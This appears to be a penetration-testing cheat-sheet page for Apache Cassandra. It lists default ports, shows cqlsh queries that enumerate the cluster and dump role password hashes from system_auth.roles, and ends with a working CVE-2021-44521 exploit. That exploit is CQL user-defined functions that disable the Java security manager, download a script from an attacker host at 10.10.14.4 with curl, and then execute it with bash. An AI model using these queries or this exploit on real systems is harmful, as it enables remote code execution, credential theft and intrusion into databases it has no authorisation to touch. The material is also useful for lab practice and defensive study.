################
Apache Cassandra
################

|

| 7199 - JMX (was 8080 pre Cassandra 0.8.xx)
| 7000 - Internode communication (not used if TLS enabled)
| 7001 - TLS Internode communication (used if TLS enabled)
| 9160 - Thrift client API
| 9042 - CQL native transport port

|

*****
Basic
*****

| https://github.com/jeffwidman/cqlsh

.. code-block:: bash

    cqlsh 10.129.228.199
    cqlsh> SELECT cluster_name, thrift_version, data_center, partitioner, native_protocol_version, rack, release_version from system.local;

    cluster_name | thrift_version | data_center | partitioner                                 | native_protocol_version | rack  | release_version
    --------------+----------------+-------------+---------------------------------------------+-------------------------+-------+-----------------
    Test Cluster |         20.1.0 | datacenter1 | org.apache.cassandra.dht.Murmur3Partitioner |                       4 | rack1 |          3.0.21

    cqlsh> SELECT * from system_auth.roles;

    role      | can_login | is_superuser | member_of | salted_hash
    -----------+-----------+--------------+-----------+--------------------------------------------------------------
    cassandra |      True |         True |      null | $2a$10$dkRBvf5nho62CXPIyBr2Hu0H6LbG9A/ILApLPJoyhDdKYlPOo912e

|

**************
CVE-2021-44521
**************

.. code-block:: sql

    CREATE KEYSPACE test WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3};
    use test;
    CREATE TABLE tab (cmd text PRIMARY KEY) WITH comment='Important biological records';
    create or replace function test.exec(name text) RETURNS NULL ON NULL INPUT RETURNS text LANGUAGE javascript AS $$
    var System = Java.type("java.lang.System");System.setSecurityManager(null);this.engine.factory.scriptEngine.eval('java.lang.Runtime.getRuntime().exec("curl http://10.10.14.4/r.sh -o /tmp/r.sh")');name $$;
    insert into tab(cmd) values('test');
    select exec(cmd) from tab;
    DROP TABLE tab;

    CREATE TABLE tab (cmd text PRIMARY KEY) WITH comment='Important biological records';
    create or replace function test.exec(name text) RETURNS NULL ON NULL INPUT RETURNS text LANGUAGE javascript AS $$
    var System = Java.type("java.lang.System");System.setSecurityManager(null);this.engine.factory.scriptEngine.eval('java.lang.Runtime.getRuntime().exec("bash /tmp/r.sh")');name $$;
    insert into tab(cmd) values('test');
    select exec(cmd) from tab;
    DROP TABLE tab;

|